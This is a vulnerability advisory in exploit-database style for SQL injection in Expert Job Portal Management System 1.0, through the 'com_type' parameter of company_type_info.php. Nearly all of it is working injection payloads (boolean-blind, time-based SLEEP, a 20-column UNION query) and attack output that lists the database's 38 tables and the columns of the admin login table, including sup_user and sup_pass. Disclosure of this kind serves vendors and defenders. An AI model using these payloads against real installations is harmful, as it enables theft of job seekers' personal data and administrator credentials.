Headline
Expert Job Portal Management System 1.0 SQL Injection
Expert Job Portal Management System version 1.0 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Vulnerability ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr :│ Website : https://www.codester.com/items/20720/ ││ Vendor : Expert IT Solution ││ Software : Expert Job Portal Management System 1.0 ││ Vuln Type: SQL Injection ││ Impact : Database Access ││ ││────────────────────────────────────────────────────────────────────────────────────────││ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and ││ damage to a company's reputation. ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2023 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /company_type_info.phphttps://website/company_type_info.php?com_type=AgentGET parameter 'com_type' is vulnerable to SQL Injection---Parameter: com_type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: com_type=Agent' AND 3360=3360 AND 'rCfC'='rCfC Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: com_type=Agent' AND (SELECT 4512 FROM (SELECT(SLEEP(5)))SCiH) AND 'MKSc'='MKSc Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: com_type=Agent' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171787071,0x5174744e6d58704d494d494952476c6f4c666346534b45754e57696b444b45794e5758567a6e6163,0x71627a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----[+] Starting the Attackfetching current databasecurrent database: 'sagor_****_job'fetching tables[38 tables]+---------------------------------+| all_country || city_manage || company_type || contact_manage || content_manage || division_manage || enroll_trainning || exp_settings || job_apply || job_categories || job_listing || job_seeker_carieer_details || job_seeker_education || job_seeker_emp_histo || job_seeker_image || job_seeker_info || job_seeker_lang_pro || job_seeker_other_relatiive_info || job_seeker_pref_details || job_seeker_profess_info || job_seeker_reff || job_seeker_resume || job_seeker_specialization || job_seeker_training || job_seeker_upload_resume || languages || package || pages || recurator_info || recurator_verification || save_jobs || social_manage || subscribe || sup_ad_log || testmonial_manage || timezones || trainning_category || trainning_manage |+---------------------------------+fetching columns for table 'sup_ad_log'[6 columns]+------------+--------------+| Column | Type |+------------+--------------+| status | int(11) || admin_role | int(11) || email | varchar(100) || id | int(11) || sup_pass | varchar(100) || sup_user | varchar(100) |+------------+--------------+[-] Done